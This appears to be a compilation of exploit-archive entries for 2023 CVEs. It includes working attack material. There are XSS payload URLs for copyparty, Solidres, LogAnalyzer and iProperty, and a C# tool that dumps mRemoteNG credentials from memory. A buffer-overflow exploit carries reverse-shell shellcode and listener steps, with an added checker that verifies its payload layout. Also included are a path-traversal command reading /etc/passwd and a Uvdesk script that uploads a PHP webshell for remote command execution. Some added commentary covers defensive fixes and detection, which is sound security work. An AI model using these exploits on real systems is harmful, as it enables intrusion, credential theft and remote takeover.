A vulnerability that exists in the web interface of the application could allow an attacker to execute malicious JavaScript code by tricking users into accessing a malicious link.

#POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
            
# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory
# Google Dork: -
# Date: 21.07.2023
# Exploit Author: Maximilian Barz
# Vendor Homepage: https://mremoteng.org/
# Software Link: https://mremoteng.org/download
# Version: mRemoteNG <= v1.77.3.1784-NB
# Tested on: Windows 11
# CVE : CVE-2023-30367




/*
Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to
store and manage multi-protocol connection configurations to remotely connect to systems.

mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev
loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,
even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text
through a memory dump and thus compromise user credentials when no custom password encryption key has been set.
This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.
Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper
*/


using System;
using System.Collections;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;


namespace mRemoteNGDumper
{
public static class Program
{

public enum MINIDUMP_TYPE
{
MiniDumpWithFullMemory = 0x00000002
}

[StructLayout(LayoutKind.Sequential, Pack = 4)]
public struct MINIDUMP_EXCEPTION_INFORMATION
{
public uint ThreadId;
public IntPtr ExceptionPointers;
public int ClientPointers;
}

[DllImport("kernel32.dll")]
static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

[DllImport("Dbghelp.dll")]
static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);


static void Main(string[] args)
{
string input;
bool configfound = false;
StringBuilder filesb;
StringBuilder linesb;
List<string> configs = new List<string>();

Process[] localByName = Process.GetProcessesByName("mRemoteNG");

if (localByName.Length == 0) {
Console.WriteLine("[-] No mRemoteNG process was found. Exiting");
System.Environment.Exit(1);
}
string assemblyPath = Assembly.GetEntryAssembly().Location;
Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);
string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";
FileStream procdumpFileStream = File.Create(dumpFileName);
MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();

// A full memory dump is necessary in the case of a managed application, otherwise no information
// regarding the managed code will be available
MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;
MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);
procdumpFileStream.Close();

filesb = new StringBuilder();
Console.WriteLine("[+] Searching for configuration files in memory dump.");
using (StreamReader reader = new StreamReader(dumpFileName))
{
while (reader.Peek() >= 0)
{
input = reader.ReadLine();
string pattern = @"(\<Node)(.*)(?=\/>)\/>";
Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);
if (m.Success)
{
configfound = true;

foreach (string config in m.Value.Split('>'))
{
configs.Add(config);
}
}

}

reader.Close();
if (configfound)
{
string currentDir = System.IO.Directory.GetCurrentDirectory();
string dumpdir = currentDir + "/dump";
if (!Directory.Exists(dumpdir))
{
Directory.CreateDirectory(dumpdir);
}

string savefilepath;
for (int i =0; i < configs.Count;i++)
{
if (!string.IsNullOrEmpty(configs[i]))
{
savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";
Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);
using (StreamWriter writer = new StreamWriter(savefilepath))
{
writer.Write(configs[i]+'>');
writer.Close();
}
}
}
Console.WriteLine("[+] Done!");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );
}
else
{
Console.WriteLine("[-] No configuration file found in memorydump. Exiting");
Console.WriteLine("[+] Deleting memorydump file!");
File.Delete(dumpFileName);
}
}
}
}
}
            
# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 28/07/2023
# Vendor: Solidres Team
# Vendor Homepage: http://solidres.com/
# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
# Demo: http://demo.solidres.com/joomla
# Version: 2.13.3
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message and
can perform a wide variety of actions, such as stealing the victim's session token or login credentials.


GET parameter 'show' is vulnerable to XSS
GET parameter 'reviews' is vulnerable to XSS
GET parameter 'type_id' is vulnerable to XSS
GET parameter 'distance' is vulnerable to XSS
GET parameter 'facilities' is vulnerable to XSS
GET parameter 'categories' is vulnerable to XSS
GET parameter 'prices' is vulnerable to XSS
GET parameter 'location' is vulnerable to XSS
GET parameter 'Itemid' is vulnerable to XSS


https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]

https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11

https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14



[-] Done
            
# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
# Date: 30.07.2023
# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
# Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
# Exploit Author: Ahmet Ümit BAYRAM
# Tested Version: 2.5.2.2
# Tested on: Windows 10 64bit

# 1.- Run the python code: exploit.py
# 2.- Open pwned.txt and copy all of its content to the clipboard
# 3.- Open Device Manager and press Add Device
# 4.- Paste the content of pwned.txt into the 'IP Address' field
# 5.- Start a listener first (nc.exe -lvnp 1337 on the LHOST the shellcode was generated with; 127.0.0.1 in the msfvenom command below), then click 'OK'
# 6.- The shellcode is windows/shell_reverse_tcp, so the target connects back to your listener and you get a reverse shell (not a bind shell)
# 7.- R.I.P. Condor <3

import struct

# Junk to reach the SEH record: the nSEH field starts at byte 1308
offset = b"A" * 1308

# nSEH: 'jmp short +6' hops over the 4-byte SEH pointer into the NOP sled; the two 0x90 are padding
nseh = b"\xEB\x06\x90\x90" # jmp short

# SEH: pop/pop/ret gadget from a module without ASLR, Rebase or SafeSEH, packed little-endian
seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)


# NOP sled so the short jump does not have to be byte-exact
nops = b"\x90" * 32 

# shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
# (reverse shell: regenerate with your own LHOST/LPORT and have the listener running before triggering the overflow)

shellcode =  b""
shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"


final_payload = offset + nseh + seh + nops + shellcode

# write the final payload to a file (binary mode: the payload is not text)
try:
    with open('pwned.txt', 'wb') as f:
        print("[+] Creating %s bytes evil payload..." % len(final_payload))
        f.write(final_payload)  # the with-block closes the file; no explicit close() needed
        print("[+] File created!")
except OSError as e:
    print("File cannot be created: %s" % e)
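A pre-flight check for the payload layout built above, added here as an example and not code from the advisory. It reuses the offset, nSEH bytes, gadget address and bad-character list from exploit.py, stands a constructed int3 sled in for the msfvenom shellcode, and verifies the three things that silently break an SEH exploit: the SEH pointer sitting 4 bytes after nSEH, the `jmp short` actually reaching the NOP sled past that pointer, and no bad character anywhere in the buffer, including inside the packed gadget address. The gadget 0x10000a27 used in the usage section is a hypothetical address chosen to show the bad-character case.

```python
import struct

# Constants taken from exploit.py above; the shellcode is replaced by a
# constructed stand-in so the checks run without msfvenom.
OFFSET = 1308                       # bytes of junk before the nSEH record
SEH_GADGET = 0x10081827             # pop ebx # pop esi # ret in NetSDK.dll (from the advisory)
BADCHARS = b"\x00\x0a\x0d"          # the -b list passed to msfvenom in the advisory
NSEH = b"\xEB\x06\x90\x90"          # jmp short +6 over the SEH pointer, plus 2 pad bytes
SAMPLE_SHELLCODE = b"\xcc" * 351    # constructed placeholder (int3 sled), not real shellcode


def build_payload(shellcode, offset=OFFSET, seh=SEH_GADGET, nops=32):
    """Same layout as exploit.py: junk | nSEH | SEH | NOP sled | shellcode."""
    return b"A" * offset + NSEH + struct.pack("<I", seh) + b"\x90" * nops + shellcode


def find_badchars(data, badchars=BADCHARS):
    """(index, byte) for every byte of `data` that the target would mangle."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def jmp_short_target(payload, at):
    """Decode 'jmp short rel8' (EB xx) at payload[at]; rel8 is signed and
    relative to the end of the 2-byte instruction."""
    opcode, rel = payload[at], payload[at + 1]
    if opcode != 0xEB:
        raise ValueError("no jmp short at offset %d" % at)
    if rel > 127:
        rel -= 256
    return at + 2 + rel


def check_layout(payload, offset=OFFSET, seh=SEH_GADGET):
    """Verify the SEH chain before sending it: the SEH pointer sits 4 bytes
    after nSEH, the short jump lands on the first NOP after that pointer,
    and nothing in the buffer contains a bad character."""
    problems = []
    seh_at = offset + 4
    if struct.unpack("<I", payload[seh_at:seh_at + 4])[0] != seh:
        problems.append("SEH pointer not found at offset %d" % seh_at)
    if jmp_short_target(payload, offset) != seh_at + 4:
        problems.append("jmp short does not land on the NOP sled")
    bad = find_badchars(payload)
    if bad:
        problems.append("bad chars at %s" % bad[:5])
    return problems


if __name__ == "__main__":
    good = build_payload(SAMPLE_SHELLCODE)
    print(check_layout(good) or "[+] layout OK, %d bytes" % len(good))
    # hypothetical gadget whose little-endian encoding contains 0x0a and 0x00
    bad_gadget = 0x10000a27
    print(check_layout(build_payload(SAMPLE_SHELLCODE, seh=bad_gadget), seh=bad_gadget))
```

Run it before pasting a freshly generated payload: a gadget that looks fine in hex can still carry a bad byte once packed, and an off-by-one in the nSEH jump shows up here rather than as a crash in the target.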
            
# Exploit Title: copyparty 1.8.2 - Directory Traversal
# Date: 14/07/2023
# Exploit Author: Vartamtzidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2
# Version: <=1.8.2
# Tested on: Debian Linux
# CVE : CVE-2023-37474




#Description
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability in the `.cpr` subfolder. The path traversal technique lets an attacker read files and directories that reside outside the web document root directory.

#POC
curl -i -s -k -X  GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'
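The `%2Fetc%2Fpasswd` PoC works because the decoded request path is joined onto the `.cpr` directory without confining the result. The following is an added example, not copyparty's own code, using a hypothetical root directory: a naive resolver that reproduces the escape, a hardened resolver that keeps the decoded path inside the root, and a detection rule that flags such requests in access-log paths.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root for the .cpr static subfolder (constructed for the example)
CPR_ROOT = "/srv/copyparty/.cpr"


def naive_resolve(root, request_path):
    """Vulnerable pattern: decode the request path and join it onto the root.
    posixpath.join discards `root` when the decoded component is absolute
    (so %2Fetc%2Fpasswd becomes /etc/passwd) and never normalises '..'."""
    return posixpath.join(root, unquote(request_path))


def safe_resolve(root, request_path):
    """Hardened pattern: decode once, drop leading slashes so the path is
    always relative, normalise away '.' and '..', then require the result to
    stay inside `root`. Returns None when the request would escape."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None
    relative = decoded.lstrip("/")
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, relative))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


def is_traversal_attempt(url_path, prefix="/.cpr/"):
    """Detection rule for access logs: flag .cpr requests whose decoded path
    is absolute, contains a '..' segment or a NUL byte."""
    if not url_path.startswith(prefix):
        return False
    decoded = unquote(url_path[len(prefix):])
    return decoded.startswith("/") or ".." in decoded.split("/") or "\x00" in decoded


if __name__ == "__main__":
    poc = "%2Fetc%2Fpasswd"
    print("naive :", naive_resolve(CPR_ROOT, poc))
    print("safe  :", safe_resolve(CPR_ROOT, poc))
    print("safe  :", safe_resolve(CPR_ROOT, "..%2F..%2Fetc%2Fpasswd"))
    # constructed access-log paths
    for path in ("/.cpr/%2Fetc%2Fpasswd", "/.cpr/..%2F..%2Fetc%2Fpasswd", "/.cpr/css/main.css"):
        print(path, "->", is_traversal_attempt(path))
```

The containment check must run on the normalised path, not on the raw string: rejecting `..` before normalisation misses encoded variants, and checking only `startswith(root)` without the trailing slash would accept a sibling such as `/srv/copyparty/.cpr2`.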
            
# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
# Date: 2023.Aug.01
# Exploit Author: Pedro (ISSDU TW)
# Vendor Homepage: https://loganalyzer.adiscon.com/
# Software Link: https://loganalyzer.adiscon.com/download/
# Version: v4.1.13 and before
# Tested on: Linux
# CVE : CVE-2023-36306

There are several installation methods.
If LogAnalyzer was installed without a database (file-based), no login is needed.
If it was installed with a database, you need to log in as at least a read-only user.

XSS Payloads are as below:

XSS
http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
            
# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 29/07/2023
# Vendor: The Thinkery LLC
# Vendor Homepage: http://thethinkery.net
# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
# Demo: https://iproperty.thethinkery.net/
# Version: 4.1.1
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send the victim a link containing a malicious URL in an email or instant message. If the victim follows it, the injected script runs in the victim's browser and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.



Path: /iproperty/property-views/all-properties-with-map

GET parameter 'filter_keyword' is vulnerable to XSS

https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1


XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4


[-] Done
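The Solidres, LogAnalyzer and iProperty entries above all list reflection points (GET parameters and, for LogAnalyzer, the path after `script.php/`) where a probe comes back unencoded. The following is an added example, not code from any of those advisories: `render_unsafe` and `render_safe` are hypothetical stand-ins for the affected templates, echoing the iProperty payload raw into a quoted attribute and with attribute-safe encoding respectively, and the parser-based check reports whether an event handler actually became an attribute, which a plain grep for `on...=` would also report for the encoded, harmless version.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Payload quoted in the iProperty advisory: closes the attribute value, adds an
# event handler and stretches the element over the whole page.
PAYLOAD = ('pihil"onmouseover="alert(1)"style="position:absolute;'
           'width:100%;height:100%;top:0;left:0;"f63m4')


def render_unsafe(keyword):
    """Hypothetical vulnerable template: the parameter is echoed raw into a
    quoted attribute value (constructed stand-in for the affected pages)."""
    return '<input type="text" name="filter_keyword" value="%s">' % keyword


def render_safe(keyword):
    """Hardened template: entity-encode including quotes, so the value can no
    longer terminate the attribute."""
    return '<input type="text" name="filter_keyword" value="%s">' % html.escape(keyword, quote=True)


class _HandlerCollector(HTMLParser):
    """Collect on* attributes that the HTML tokenizer actually recognises."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.handlers.extend(name.lower() for name, _ in attrs if name.lower().startswith("on"))


def injected_handlers(markup):
    """Event-handler attributes present in the markup; a non-empty result means
    the injected text escaped its attribute and became live HTML."""
    p = _HandlerCollector()
    p.feed(markup)
    p.close()
    return p.handlers


def classify_reflection(body, probe):
    """'raw' if the probe appears verbatim (exploitable in tag/attribute
    context), 'encoded' if only its entity-escaped form appears, else 'absent'."""
    if probe in body:
        return "raw"
    if html.escape(probe, quote=True) in body:
        return "encoded"
    return "absent"


def probe_url(base, param, probe=PAYLOAD):
    """URL-encode the probe for a GET parameter, filling the advisories' [XSS] slot."""
    return "%s?%s=%s" % (base, param, quote(probe, safe=""))


if __name__ == "__main__":
    for label, page in (("unsafe", render_unsafe(PAYLOAD)), ("safe", render_safe(PAYLOAD))):
        print(label, classify_reflection(page, PAYLOAD), injected_handlers(page))
    print(probe_url("https://website/iproperty/property-views/all-properties-with-map", "filter_keyword"))
```

Against a live target, fetch `probe_url(...)` and pass the response body to `classify_reflection` and `injected_handlers`; `raw` plus a non-empty handler list confirms attribute breakout, while `encoded` shows the output encoding that closes the issue.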
            
# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security 
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6


import requests
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args

def main():
    args = get_args()
    base_url = args.url.rstrip("/")

    command = args.command
    uploaded_file = "shell.php"
    # Knowledgebase folder images are stored under a web-served path with their original name,
    # so the uploaded PHP file can be requested directly afterwards
    url_cmd = base_url + "/assets/knowledgebase/" + uploaded_file

    # Edit your credentials here (the upload needs an authenticated member account)
    login_data = {
        "_username": "admin@adm.com",
        "_password": "passwd",
        "_remember_me": "off"
    }

    # The Content-Type is client-controlled; the server keeps the .php name and body unchanged
    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
    }

    s = requests.session()
    # Login (the session object keeps the cookie for the following requests)
    s.post(base_url + "/en/member/login", data=login_data)
    # Upload the webshell as the folder image
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
    if upload_response.status_code >= 400:
        print("[-] Upload failed: HTTP %d" % upload_response.status_code)
        return
    # Execute command (params= URL-encodes it, so spaces and '&' survive)
    cmd = s.get(url_cmd, params={"cmd": command})
    print(cmd.text)

if __name__ == "__main__":
    main()